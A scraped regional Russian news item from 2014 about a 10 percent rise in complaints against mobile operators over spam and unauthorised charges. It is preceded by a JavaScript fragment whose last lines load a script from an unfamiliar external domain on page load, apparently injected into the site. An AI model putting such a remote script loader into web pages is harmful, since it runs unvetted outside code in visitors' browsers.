, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Южноуральцы стали чаще жаловаться на операторов мобильной связи

По данным регионального Управления Роспотребнадзора, в прошлом году стали чаще жаловаться  на операторов мобильной связи. Количество обращений от граждан увеличилось на 10 процентов. Общее количество недовольных работой сотовых операторов составило 150 человек.

Наиболее распространенными жалобами южноуральцев является отсутствие информации, а также рассылка спама. При этом за некоторые сообщения рекламного характера без ведома получателя снимались деньги со счета. По всем обращениям были проведены проверки. В результате было возбуждено несколько административных дел, на недобросовестных операторов были наложены штрафы.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
10:52 - 18 марта 2014
|
автор: U-RSS
|
(393)
|
(0)

Комментарии (0)

Я человек
Я бот